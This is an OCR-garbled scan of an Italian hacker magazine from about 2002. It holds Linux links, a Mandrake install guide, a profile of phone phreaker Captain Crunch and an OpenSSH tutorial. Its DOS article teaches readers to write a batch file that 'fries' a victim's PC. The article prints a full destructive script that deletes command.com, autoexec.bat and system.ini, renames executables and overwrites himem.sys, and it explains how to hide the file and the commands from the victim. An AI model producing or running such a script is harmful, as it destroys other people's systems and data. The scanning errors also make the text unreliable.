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DEBIAN 

http : / /www . debian . org/ 
La Debian è una delle 
distribuzioni più' 
conosciute, con più di 1500 
pacchetti software 
precompilati e pronti 
per essere installati 
sulla propria macchina. 

LINUX APPLICATIONS 

http : / /www . linuxapps . com/ 
Lo slogan è "Se non riesci 
a trovarlo qui, non lo 
troverai da nessuna 
parte! "... 

LINUX FAQ & NEWS 

http: //www.pippo. cova/ linux. html 

Un appassionante elenco 

di domande e risposte 

in italiano relative al Linux 

e al mondo che gli gira. 

LINUX GAMES 

http: //www. linuxgames . com/ 
A volte anche i pinguini 
hanno bisogno di divertirsi. 

LINUX IN ITALIA 

http : //www. linux . it/ 
La community italiana. 

LINUX ON LINE 

http : //www. linux . org/ 
Informazioni, curiosità 
e link sul pinguino. 



RED HAT 



http : / /www . redhat . com/ 
Distribuzione di Linux 
a pagamento, ca 
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IL PIÙ SERIO ANTAGONISTA DI "BILL" 



Installazione di Mandrake 8.2 



, ome ampiamente descritto nell'articolo, 
I Mandrake 8.2 si distingue dalle altre dis- 
tribuzioni per la semplicità dell' installazione 
e dell'utilizzo. L'ultima relase di questa distri- 
buzione raggiunge livelli di automazione no- 
tevoli: vediamo brevemente in dettaglio co- 
me mettere su una Linux Box Mandrake fun- 
zionante e adatta ad ogni esigenza. 

1 La partizione del disco 

La fase cruciale è senza dubbio quella del- 
l'installazione: ci rivolgiamo qui a tutti quegli 
utenti che, provenienti da sistemi Windows, 
vogliono installare sul proprio computer 
Mandrake senza dover rinunciare al vecchio 
S.O. 

In base alle differenti pacchettizzazioni, 
Mandrake è fornita su due o più CdRom: ba- 
sta mettere il primo di questi nel nostro letto- 
re, bootare la macchina e attendere qualche 
istante per trovarsi di fronte all'installer grafi- 
co. Per prima cosa dovremo scegliere la no- 
stra nazionalità e la nostra lingua. 

Un consiglio prezioso: in fase di installa- 
zione lasciate accese tutte le periferiche di cui 
disponete; scanner, stampanti e videocame- 
re verranno riconosciute una volta per tutte 
ed eviterete di dover configurare tutto a ma- 
no in seguito. Esiste la possibilità che Man- 
drake non riconosca determinati tipi di hard- 



ware: questo può accadere se tali dispositivi 
sono o molto vecchi o molto recenti. In que- 
sto caso è consigliato portare a termine l'in- 
stallazione (ovviamente) e procedere in se- 
guito alla ricerca dei vari driver. 

Dopo aver scelto la lingua da supporta- 
re, l'installer ci proporrà svariate soluzioni di 
installazione: se sul nostro pc è già presente 
una partizione Ext2 Linux potremo usare que- 
sta per ospitare il nuovo S.O.; se invece è la 
prima volta che mettiamo su una distro Li- 
nux, Mandrake analizzerà il nostro disco fis- 
so e ci chiederà quanto dello spazio della 
vecchia partizione assegnare a quelle nuove. 

E 1 anche presente una comoda opzione 
di "aggiornamento pacchetti" nel caso vo- 
gliamo effettuare un aggiornamento, per 
esempio, da Mandrake 8.1 a Mandrake 8.2. 

O Installazione dei pacchetti 

Scelti i mount point (i punti in cui vengono 
"montate" le partizioni Linux) e formattata 
una o tutte le partizioni Linux, il programma 
di installazione ci proporrà una serie di pac- 
chetti da installare: se per esempio sappia- 
mo che la nostra Linux Box dovrà svolgere 
mansioni server, potremo già in questa fase 
procedere all'installazione dei vari server 
Web, FTP e via dicendo. Ovviamente, per un 
uso domestico è più sensato risparmiare 




spazio (e grattacapi lagati alla sicurezza) la- 
sciando sul ed questi pacchetti. 

A questo punto il sistema prowederà a 
copiare e scompattare i vari files: completa- 
ta anche questa fase, è il momento di asse- 
gnare le password per root e di creare un 
utente col quale lavoreremo normalmente 
(infatti è assolutamente sconsigliabile utilizza- 
re la nostra Linux Box per il lavoro di tutti i 
giorni come utente root, molto meglio usare 
un utente normale e delegare a root solo 
quelle operazioni di "aministrazione" che ri- 
chiedono particolari privilegi, come l'installa- 
zione di programmi etc...). 



* Scelta del sisitema operati- 
W vo di "lancio" 

Le ultime fasi di installazione ci chiederanno 
di configurare LI LO, il bootloader, che si oc- 
cuperà di domandarci all'avvio della macchi- 
na quale Sistema operativo, lanciare, e se 
vogliamo collegarci immediatamente al sito 
Mandrake per scaricare gli ultimi pacchetti 
aggiornati. 

A questo punto l'installazione di Mandra- 
ke 8.2 è completata: lanciando per la prima 
volta il sistema operativo ci troveremo di 
fronte a un wizard che ci consentirà di impo- 
stare il nostro account di posta eletronica, il 
nostro dektop etc. 

Nel caso in cui avessimo effettuato un 
aggiornamento da una precedente versione 
di Mandrake ritroveremo la nostra home 
completamente integra, con tutti i documen- 
ti e le impostazioni che avevamo sul prece- 
dente S.O. Maggiori info su: 
http://www.linux-mandrake.com/it/ 



SCONOSCIUTA 



) Immaginate il vostro disco fisso 
come una torta. Ogni fetta che facciamo 
di quest'ultima può essere intesa come 
una partizione, una sezione della 
superficie di memorizzazione dei dati. 
Per partizionare un disco esistono diversi 
strumenti, liberi come fips e fdisk, che 
possono essere scaricati liberamente da 
Internet, oppure sono disponibili 
software commerciali che rendono 
l'operazione estrememanete semplice ed 
intuitiva, alla portata di tutti. 
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CAPN 
CRUNCH 



apiam Lrunch: 



Nel primo numera abbiamo dedicata qualcosa come sei righe 
al precursore di tutti gli hacker moderni: un trionfo! Era quindi 
ouuio che decidessimo di raccontamelo in modo approfondito 




ohn Draper, alias Captain 
Crunch, è stato il primo hac- 
ker che la storia ricordi. Ma- 
gari non il primo assoluto. 
Sicuramente il più geniale. 
La storia è abbastanza no- 
ta, Draper, in pieni anni '70, aveva 
scoperto che un fischietto trovato al- 
l'interno di una scatola di cereali, o 
patatine a seconda delle versioni, 
emetteva un suono con una frequen- 
za pari a 2600 Hertz in grado di 
sbloccare la linea del sistema telefo- 
nico americano e di ottenere il se- 
gnale libero per chiamare in ogni an- 
golo del pianeta.l cerali o patatine 
che dir si voglia, avevano un nome 
piuttosto divertente Captain Crunch, 
che è diventato a pieno titolo il so- 
prannome di Draper. Draper dopo 
aver utilizzato la tecnica del fischiet- 
to, ha messo a punto un sistema più 
complesso e efficace per chiamare a 
sbafo ovunque: Bluebox. Un dispositi- 
vo che consentiva di accedere ai nu- 
meri verdi per incanalare le chiama- 
te in qualsiasi direzione. Secondo le 
leggende John Draper utilizzando 



nnura in valicano spaccianaosi per 
Henry Kissinger. Ma la cosa curiosa è 
che al progetto Bluebox parteciparo- 
no anche nomi di spicco dello scenario 
informatico contemporaneo come Ste- 
ve Jobs, attuale leader di Apple. Solo 
che John Draper ha sempre amato 
raccontare le sue scoperte e per que- 
sto è stato individuato e arrestato dal- 
l'FBI, mentre i suoi "colleghi" sono 
eA mpre rimasti al sicuro, più defilati. 

I infatti Draper nel bene o nel male 
ha continuato la sua vita da "zingaro" 
dell'informatica mentre i suoi coeta- 
nei si accomodavano in dietro a co- 
mode scrivanie di palissandro con 
poltrona in pelle incorporata. Ha par- 
tecipato, insieme all'amico Jobs alla 
nascita di Apple, ha sviluppato i primi 
videogiochi e per lungo tempo ha sta- 
" >nato in India cavalcando l'onda 
della controcultura degli anni '70. 

Sembra che come animale dome- 
stico abbia un alligatore, che tiene 
nella vasca da bagno. Una scelta 
perfettamente in linea con il suo stile 
di vita. Le notizie più recenti del "no- 

o capitano" tuttavia lo danno co- 

s prossimo al salto della barricata. 

mbra infatti che aiuterà i siti di 
grosse società a difendersi dagli at- 
tacchi dei pirati della rete. Ma il mito 
rimane, m 

Blue Box: permetteva di attivare i 
codici di controllo delle linee 
telefoniche analogiche e effettuare 
telefonate gratuitamente. 



ATTREZZI 
DEL MESTIERE 

Il catalogo degli strumenti 
utilizzati Da Crunh per 
telefonare a sbafo è amplissimo: 
monete di ghiaccio, scariche 
elettriche, magneti, fino 
alla sofisticatissima e famosa 
Blue Box, un marchingegno capace 
di imitare i segnali tipici 
delle linee di commutazione. 
Così finì per interessarsi 
anche l'FBI e Captain Crunch 
venne arrestato negli anni 
Settanta. 

PHONE PHREAKING 

Col passare degli anni 
e con l'avvento dei chip DSP 
il phone phreaking passa sui 
computer e le blue box diventano 
programmi software che generano 
e inviano i toni desiderati. 
Ancora oggi si segnalano 150mila 
attacchi ai telefoni pubblici, 
solo a New York mentre phone 
phreaker di tutto il mondo 
si ritrovano periodicamente 
sulle linee per chiacchierare. 

FONTI 

In Cyberpunk, antologia di testi 
politici, ed. Shake, 1990; 
Paul Mungo e Bryan Glough, 
Approaching Zero, Random House, 
1992. H 
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Dos è rarchetipo del sistema operatiua, è alla base di Windows, ma può essere 

usato anche per "terminarla"... 



Molti pensano che e il buon 
vecchio Dos sia ormai inu- 
tile... Ma chi smanetta con 
i PC sin da quando ha 5 
anni (il mio caso :D) e 
quindi ha usato Dos, sa 
benissimo tutti i suoi limiti e tutti i suoi 
vantaggi... 

Quante volte avete pensato: "ora a 
quello gli Sfrittello il PC...!". Ma poi 
quando era ora di agire non sapevate 
come fare. Bene, Il Dos è di grande 
aiuto in questi casi. 

Se non sapete programmare, non 
usate virus per paura di infettarvi, Dos 
può fare al caso vostro. 

Ma cominciamo col dire cos'è Dos 
(qualcuno non lo sa???). E' il primo 
sistema operativo di casa Microsoft, 
non ha nulla di visuale, ma conoscen- 
do alcuni comandi si può fare di tutto. 
Dos è il padre di Windows, e anche se 
ad alcuni può sembrare strano 
Windows usa ancora molto Dos... 



» Si comincia 

Quasi tutti voi 
avrete sentito par- 
lare del celebre file 
AUTOEXEC.BAT, 
presente in tutti i 
sistemi di casa 
Microsoft. Quello 

è un esempio di 

file bat. Un file bat 
non è altro che un file che esegue una 
serie di comandi Dos in successione. 
Con un qualsiasi editor (usate note- 
pad!) si può modificare un file bat, 




che potrà eseguire tutti i comandi a 
vostro piacimento. 

Copiatevi il vostro file AUTOEXEC.BAT 
da qualche parte sull'hard-disk (non 
modificate né eliminate quello di 
sistema perché questo file è di fonda- 
mentale importanza per Windows). 
Schiacciando col tasto destro, e 
andando su "modifica" verrà aperto il 
notepad che conterrà qualche stringa 
di comando. 

Quelle sono alcune operazioni che 
il PC esegue alla sua accensione. 

Cancellate tutto il contenuto e ora 
avete un file bat pulito da editare 
come volete. 

Il Dos non è molto sicuro. Come 
saprete se si prova a cancellare un file 
di importanza vitale per Windows, da 
Windows, questo ci avverte e non ce 
lo fa eliminare. Ma questo discorso 
non vale col Dos!! Se ad esempio nel 
file bat scriviamo: 

-->delc:\windows\comma nd.com 

salviamo il file e lo apriamo. Il file bat 
cancellerà il file command.com della 
macchina e al prossimo riavvio il PC 
non partirà! 

E questo è un piccolo esempio, un 
file bat può formattare l'hard disk, can- 
cellare dati, copiare dati. 



» I comandi principali 

Questi sono comandi base di Dos, 
anche se ne esisotno molti altri. 

CD <nomecartella> entra nella cartella 



MD <nomecartella> crea una cartella 

RD <nomecartella> cancella la cartella 

DEL <file> cancella il file 

COPY <file> copia un file in una 
directory o in un altro file 

DIR visualizza file 

DIR/p visualizza file in più pagine 

RENAME rinomina un file 

FORMAT <disc> Formatta il disco 

Ma entriamo nei particolari... Ora 
vi spiegherò come fare determinate 
cosuccie: D. 
Per cominciare, ogni file deve iniziare con: 

--> @echo off 

A che serve? 

Con @echo off l'utente non vedrà il 

comando appena eseguito. 

Cioè? 

Se io faccio un file che entra nella car- 
tella c:\prova\ scriverò: 

--> @echo off 
--> ed prova 

e apparirà: 

--> c:\ 

--> c:\prova\ 

Se invece non dovessi mettere 
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@echo off apparirebbe sulla nostra 
schermata: 

--> c:\ 

--> c:\cd prova 

IL COMANDO DA ME ESEGUITO! 

--> c:\prova\ 

Quindi se volete cancellare un file a 
qualcuno e questo ci capisce un po' di 
Dos dovrete per forza usare il coman- 
do @echo off perché se no lui si vedrà 
apparire ---> del c:\nomefile. estensio- 
ne e se ne accorgerà subito! 

Analogamente il comando echo 
può servire a far visualizzare delle scrit- 
te. Per esempio se scrivo: 



il sistema della vittima e non voglio che 
sia visibile e modificabile scriverò: 
— > ATTRIB nomefile.bat +H +R 

Il comando COPY 

Questo comando è molto flessibile e 
permette le seguenti operazioni: 

--> copy file.estensione c:\nome- 

cartella\<«> copierà il file nella 
cartella 

— > copy file2.estensione+file1. 

estensione <--> sostituirà al file2 il 
filel 

--> copy filel .estensione+file2. 




--> echo CIAO A TUTTI 

nel file apparirà la scritta CIAO A TUTTI 
Per scrivere una riga vuota basterà 
invece scrivere --> echo. 
Per cancellare quello scritto fino ad ora 
si userà --> cls. 



» Non finisci mica qui! 

Ecco altri comandi che è importante 
conoscere. 

Gli attributi 

Molti di voi si saranno chiesti come si 
modificano gli attributi di un file via dos. 
Il comando è ATTRIB e le opzioni sono: 

+/- R abilita/disabilita sola lettura 

+/- A abilita/disabilita l'opzione 
archivio 

+/- S abilita/disabilita l'opzione 
sistema 

+/- H abilita/disabilita l'opzione 
nascosto 

Per esempio, creo un file dannoso per 



estensione c:\nomecartella\ 

copierà i file nella cartella 
Il comando FIND 

Trova un determinato carattere o paro- 
la in un file. 

FIND "CIAO" file.estensione cerca 
nel file.estensione la frase CIAO 

Il comando TYPE 

Visualizza il contenuto di un file. 

Questo comando può essere usato 
per sfruttare un baco di Windows... 
scrivendo: 



--> type XMSXXXXO > c:\win- 
dows\himem.sys 

Il file dovrebbe venir riempito di carat- 
teri inutili fino ad occupare quantità 
enormi. 
Un esempio molto dannoso: 

--> @echo off 

--> del c:\autoexec.bat 

--> del c:\config.sys 

--> renarne c:\*.exe *.hacked 

--> del c:\windows\win.* 

— > del c:\windows\system.ini 
--> renarne c:\windowsV.exe 
c:\windows\*. hacked 

— > del c:\command.com 
--> del 

c:\windows\command.com 
--> type XMSXXXXO > c:\win- 
dows\himem.sys 



a 



DOS: Disk Operating System 
Software che consente l'uso 
del computer. E 1 composto da: 
il BIOS, il kernel e la shell. 



Il PC dove verrà eseguito questo pro- 
gramma non parirtirà più! E il vostro obbiet- 
tivo sarà completato :D. 

La guida è finita. Spero che sia stata di 
vostro gradimento e che vi sia servita a 
qualcosa :D. 



» Una piccola 
"preghiera" 



Data la pericolosità della procedura vi 
prego di non "frittellare" il PC a nessu- 
no, ma di considerare questo articolo 
una interessante esercitazione. El 
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Connessioni 

criptate con SSH 

Il misterioso LoRdUicio ci guida attrauerso 
i meandri di Secure Shell, un efficace muda 
di proteggerci dallo sniffing dei dati... 



- ^ -* IfJ ■ 
SNIFFER: Unosniffe. , 

un qualsiasi strumento, sia e 

un Sb-ftware o un apparato 

hardware, che raccoglie 

le informazioni cine jgidaaian 




I 



no dei maggiori pericoli della rete 
è lo sniffing, una delle tecniche più 
usate dai cracker per ottenere user- 
name e password validi per acce- 
dere ai sistemi che vogliono violare. Con la 
tecnica dello sniffing gli eventuali malinten- 
zionati si pongono in ascolto sulla nostra re- 
te ed intercettano tutti i pacchetti in transito, 
alla ricerca di username e password tra- 
smessi in chiaro. Se la vostra rete nn è sicura 
o volete collegarvi ad un server Unix che è su 
una rete diversa dalla vostra, per evitare il 
pericolo dello sniffing, conviene effettuare 
connessioni criptate... Secure Shell (ovvero 
Ssh) è il modo migliore per criptare le vostre 
connessioni verso altri sistemi e poter naviga- 
re tranquilli. Con ssh è possibile effettuare il 
tunnelling di connessioni xl 1 o di altre appli- 
cazioni che lavorano su particolari porte, in 
modo che esse lavorino in modo sicuro! 



►#Ssh1eSsh2 



La Sshl è la più vecchia, la Ssh2 è una 
completa riscrittura della vecchia versione ed 
è più sicura. Noi comunque ci occuperemo 



priva versione. 



Questo protocol I 
"grossi" problemi di si 
TCP/IP come lo spoofing 



inoltre alcuni 
dei protocolli 



IP spoofing — -> falsificazione dell'indirizzo 
IP del mittente 

DNS spoofing — -> falsificazione delle infor- 
mazioni nel DNS 

Routing spoofing — -> falsificazione delle 
strade intraprese dai pacchetti 



\ — > Iniziamo < — / 

Ogni host su cui è installato ssh possiede 
una coppia di chiavi RSA (un algoritmo di 
crittografia a chiave asimmetrica) lunghe 
1024 bit, una pubblica ed una privata. In 
più, ogni utente che utilizza ssh può opzio- 
nalmente generare una propria coppia di 
chiavi RSA. All'atto della connessione, il ser- 
ver comunica al client due chiavi pubbliche: 

* una fissa di 1 024 bit che è la vera e pro- 
pria chiave dell'host //// 

* l'altra di 768 bit che viene rigenerata ogni 
ora //// 

Il client allora genera una sequenza casuale 
di 256 bit (challange) e la codifica con le 
chiavi pubbliche del server. Da questo mo- 
mento in poi la connessione viene crittogra- 
fata con uno degli algoritmi a chiave sim- 
metrica supportati da ssh (IDEA, DES, 
3DES,ecc.) e si passa alla fase di autentica- 



V— > AuTeNtiFiCazIOnE <-— / 

Quando un utente tenta di collegarsi ad 
un sistema remoto, I' autentificazione può 
avvenire in diversi modi: 



Prevede che se il sistema da cui l'utente ten- 
ta il collegamento è elencato in uno dei file 
/etc/hosts.equiv, /etc/ssh/shosts.equiv, $ HO- 
ME/, rhosts, $HOME/.shosts, l'accesso è con- 
sentito senza password. Poiché questo meto- 
do comporta una scarsa protezione verso i 
tentativi di spoofing, esso è disabilitato per 
default. 



;ombinazione tra la 



* RhostsRS 

Questo metodo è la combinazione tra la 
precedente ed una autentificazione basata 
su sistema RSA. In pratica l'accesso è con- 
sentito dai file /etc/hosts.equiv , 
/etc/ssh/shosts.equiv , $ HOME/, rhosts , 
$HOME/.shosts e inoltre è presente 
nel file /etc/ssh_known_hosts oppure $HO- 
ME/.ssh/known_hosts la chiave ke 
identifica il client che sta tentando la connes- 
sione,allora l'accesso è consentito. 

* RSAAuthenlcat 

Questo metodo si basa sul sistema di chiavi 
pubbliche e private Rsa. Ad ogni 
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DNS: Domain Name Server 
Server Internet che gestisce le 
richieste di URL da parte degli utenti. 
Ciascun ISP ha un DNS. 



utente sono associate due chiavi utilizzate 
per l'autentificazione,una pubblica (imma- 
gazzinata nel file $HOME/.ssh/identity.pub 
) ed una privata ( immagazzinata nel file 
$HOME/.ssh/identity ).ln fase di autentifica- 
zione il client fornisce la chiave pubblica 
con la quale tenta il collegamento. 

Il server controlla all'interno del file 
$HOME/.ssh/authorized_keys che sia pre- 
sente la chiave inviata dal client, in tal ca- 
so, invia al client un challenge (un nume- 
ro casuale,criptato usando la chiave pub- 
blica del client ). Il client decripta il chal- 
lenge con la chiave privata deH'utente,e ne 
da comunicazione al server, dimostrando 
così di avere la chiave privata,così l'utente 
può accedere senza password . 

* Password 

Se nessuno di questi metodi esposti ha suc- 
cesso , l'autentificazione viene effettuata con 
la richiesta all'utente di una password,che 
viene comunque criptata . 

» Installazione e 
figurazione di 



la sua installazione e configurazione sulla 
nostra linux-box. In questo articolo utilizze- 
remo OpenSSH (www.openssh.com), 
una versione free di ssh,compatibile con i 
2 protocolli sshl e ssh2. 

Per poter usare openshh nel vostro si- 
stema serve che sia già installato OpenSSL 
(www.openssl.com) e le librerie Zlib 
(www.gzip.org/zlib/). 
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Tutti questi software sono disponibili sia in 
formato RPM e sia in tar.gz. Possiamo in- 
stallare i pacchetti con i command: 



[root@root]$ rpm -ivh pakketto.rpm 

[root@root]$ tar xfvz pakketto. tar.gz 
[root@root]$ ed pakketto 
[root@root]$ ./configure 
[root@root]$ make && make instali 



Una volta installato openssl e le librerie 
zlib possiamo procedere alla installazione di 
openssh. Se utilizziamo il pacchetto rpm il la- 
voro sarà semplificato, noi useremo il tar.gz 



[root@root]$ tar xfvz openssh-2.9.tar.gz 
[root@root]$ ed openssh-2.9p2 
[root@root]$ ./configure -syseonf 
dir=/etc/ssh 
[root@root]$ make 
[root@root]$ make instali 
[root@root]$ make host-key 



Con il comando "-sysconfdir" dicia- 
mo ad ssh di utilizzare come directory x i 
file d'installazione /etc/ssh anziché quella 
di default /usr/local/etc. 

Con il comando "host-key x creiamo le 
host keyRSA e DSA. A questo punto per 
provare il tutto basterà lanciare il demone 
sshd con il comando: 



[root@root]$ sshd start 



,,vOt@root]$ ss.. .. , , ,, 

In questo modo si tenta la connessione 
con l'utente di default del client. 
Per collegarci con il nostro utente: 

[root@root]$ ssh utente@host.dominio.it 

oppur 

[root@root]$ ssh host.dominio.it -I utente 



Se effettuate la connessione tramite mo- 
dem, avete la possibilità di renderla più ve- 
loce con la compressione dei dati, con il se- 
guente comando: 



[root@root]$ ssh -C utente@host.dominio.it 



Con ssh è possibile effettuare il trasferi- 
mento dei file in maniera sicura sulla rete. Il 
comando per far questo è x scp" che funzio- 
na in maniera simile al cp di linux. Ad esem- 
pio x trasferire un file ad un sistema remoto 
si usa il seguente messaggio: 



[root@root]$ sep /home/vicio/ssh.txt 
utente@host.dominio.it:/nfzcrew/tutorial 

e per eseguire lo procedura inverso 

[root@root]$ scputente@host.dominio.it: 
/nfzcrew/tutorial/ssh.txt/home/vicio 

Per personalizzare il funzionamento di 
ssh è possibile modificare alcuni file di 
configurazione. In particolare, per modi- 
ficare le opzioni del client ssh il file da 
modificare è /etc/ssh/ssh_config. 

Modificando questo file si potrà cam- 
biare le modalità di funzionamento del 
client per tutti gli utenti. Se si vuole per- 
sonalizzare il client per ogni alcuni utenti 
basterà copiare il file nella home di cia- 
scuno di essi, e più precisamente in 
$HOME/.ssh/ssh_config procedendo poi 
la sua modifica. 

Se si vuole modificare il funzionamen- 
to del demone sshd il file da modificare è 
/etc/ssh/sshd_config.X esempio se si vuo- 
le togliere l'accesso all'utente root tramite 
ssh, basta aggiungere a tale file la stringa 

PermitRootLogin no 

Openssh è uno strumento molto fles- 
sibile, per imparare ad usarlo al meglio 
leggetevi la sua documentazione. 

Se volete un sistema "sicuro" avrete 



fatto il primo passo... I 





Dopo aver trattato gli aspetti teorici su cui 
si basa ssh,vediamo come procedere per 




Per col legarsi ad un sistema remoto con 
Ssh utilizziamo il comando: 




Lordvicio 
lordvicio@hotmail.com 
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